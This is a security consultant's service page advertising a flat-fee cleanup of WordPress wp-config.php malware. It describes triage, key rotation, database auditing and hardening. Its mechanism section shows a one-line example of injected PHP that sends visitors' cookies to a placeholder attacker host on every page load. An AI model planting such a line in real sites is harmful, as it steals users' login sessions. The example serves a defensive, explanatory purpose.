WP-CONFIG.PHP · WORDPRESS · CLEANED
wp-config.php malware cleanup.
wp-config.php runs on every WordPress page load, which is why attackers love it. I pull out the injection, rotate the keys, and tell you what the attacker had access to. Flat $279.
MECHANISM
wp-config.php is the worst place for an attacker to plant code.
wp-config.php loads on every WordPress request, before WordPress itself has a chance to filter anything. An attacker who modifies this file can execute code on every page, capture every login, or add hidden admin users that don’t appear in the dashboard.
Once wp-config.php has been touched, your salts, database password, and authentication keys must be considered compromised. I rotate everything as part of the cleanup. No extra invoice.
01 02 // Legitimate wp-config starts with constants. 03 define('DB_NAME', 'wp_database'); 04 05 // Injected — sends auth cookies to attacker on every request: 06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);
What I remove
Every line, every key, every account.
-
TRIAGE
wp-config.php compared line-by-line against a clean baseline. Every non-standard line is reviewed.
-
WP-CONFIG
Injected code removed. Stray include/require lines pointing at unfamiliar files — audited and removed.
-
KEYS
AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY and their salts rotated. All sessions invalidated.
-
DATABASE
Hidden admin users removed. wp_options autoloaded payloads audited for related persistence.
-
HARDENING
wp-config.php permissions tightened. .htaccess and Nginx rules added to deny direct access.
-
REPORT
Plain-English forensic write-up: what the attacker had access to, what was rotated, what you still need to do.
Pricing
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Start a cleanupMonitoring
$29 / mo
per site, cancel any time
Continuous monitoring, hardening, one cleanup per year included.
Get protectedPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
See all services →Email [email protected] or use the contact form.